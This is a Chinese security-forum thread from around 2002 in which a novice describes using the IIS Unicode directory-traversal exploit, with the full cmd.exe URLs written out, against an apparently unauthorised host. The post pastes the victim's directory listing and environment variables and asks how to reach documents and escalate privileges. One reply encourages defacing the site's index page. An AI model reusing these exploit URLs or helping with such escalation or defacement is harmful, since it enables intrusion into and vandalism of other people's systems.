论坛: 菜鸟乐园 标题: 然后呢?我怎么做??? 复制本贴地址    
作者: lankykin [lankykin]    论坛用户   登录
各位,我有这样的一个问题:我利用IIS的漏洞也就是http://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:得到了一台计算机的目录如下:
 Directory of C:\

2001-05-15  20:33       <DIR>          SYS98H
2000-10-08  12:28       <DIR>          WINDOWS
2000-10-08  12:28       <DIR>          REALMODE
2000-10-08  12:35       <DIR>          Program Files
2000-10-08  13:24       <DIR>          My Documents
2002-01-07  15:34                  714 FRONTPG.LOG
2002-01-07  15:50       <DIR>          UNPACK
2001-12-19  09:28               20,946 ~WRD3439.tmp
2000-11-01  10:53       <DIR>          safe
2001-05-15  20:33       <DIR>          SYS98
2001-11-10  19:48       <DIR>          KV-Back.Vir
2000-10-08  13:29                  281 CONFIG.PCC
2000-11-21  20:51               84,374 HS45.EXE
2000-11-27  15:27               17,868 JIANKA~1.HTM
2000-10-08  13:30                  482 AUTOEXEC.DO_
2000-10-08  13:24                  519 AUTOEXEC.PCC
2000-10-08  14:08                  310 CONFIG.001
2000-10-30  15:38                1,388 FRUNLOG.TXT
2000-10-08  12:42                2,164 PDOS.DEF
2000-10-10  15:47                  225 RESETLOG.TXT
2002-01-07  15:38                6,348 SCANDISK.LOG
2000-11-01  10:42                  884 SETUPXLG.TXT
2000-10-30  18:26            3,047,456 SYSTEM.NEW
2000-10-30  18:25              290,848 USER.NEW
2000-11-10  16:15                  256 ZH.DAT
2000-12-01  10:00            2,142,432 WINAMP~1.EXE
2000-12-23  11:43               35,409 WORD.HTM
2000-12-01  10:32                  291 快捷方~1.LNK
2001-01-03  13:39                7,454 DANCI.HTM
2001-12-20  19:56       <DIR>          kejian
2001-05-15  21:41       <DIR>          C-Media
2001-05-17  09:59       <DIR>          Inetpub
2002-01-03  13:59       <DIR>          TEMP
2001-05-25  21:15                  131 APInstall.log
2001-09-03  22:29                    3 Count.txt
              22 File(s)      5,660,783 bytes
              13 Dir(s)      93,011,968 bytes free
然后我用
http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set
得到了他的设置文件如下:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:


ALLUSERSPROFILE=E:\Documents and Settings\All Users
CommonProgramFiles=E:\Program Files\Common Files
COMPUTERNAME=PING
ComSpec=E:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=10.10.1.95
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_VIA=1.0 fee-server
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=10.10.1.95
NUMBER_OF_PROCESSORS=1
Os2LibPath=E:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=E:\WINNT\system32;E:\WINNT;E:\WINNT\System32\Wbem
PATH_TRANSLATED=e:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fam
 现在的问题是,我想进入他的文档,我该怎么样进入呢?我还得到了一个USER帐号,我应该怎么样提高权限呢???????
 

地主 发表时间: 1/10 15:8
回复: xiaoxingchi [xiaoxingchi]   论坛用户   登录
http://www.20cn.net/ns/hk/hacker/data/20010128103456.htm

这里有一篇文章,你可以举一反三。。。

B1层 发表时间: 1/11 1:14
回复: live_learn [live_learn]   论坛用户   登录
holy fuck. you don't need to elevate your usage level! you are the root now! that leak is a fucking idiotic moron like leak and it's damn lucky to find it. fuck that system maintainer, he/she should go to hell! 
i suggest you change his/her index.html, and teach him/her a lesson.
do you understand what i am talking about? damn i can't type chinese. basically what i am saying here is that you have the editing right in that system. you can't write whatever you want.

B2层 发表时间: 1/11 11:17
回复: group [group]   论坛用户   登录
麻烦少些脏话好不好,我有洁癖……

B3层 发表时间: 1/12 0:41
回复: xjliuwei [xjliuwei]   论坛用户   登录
这个问题我一时还解决不了!不过你可以今cy07里看看!谢谢!

B4层 发表时间: 04-06-09 06:05

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号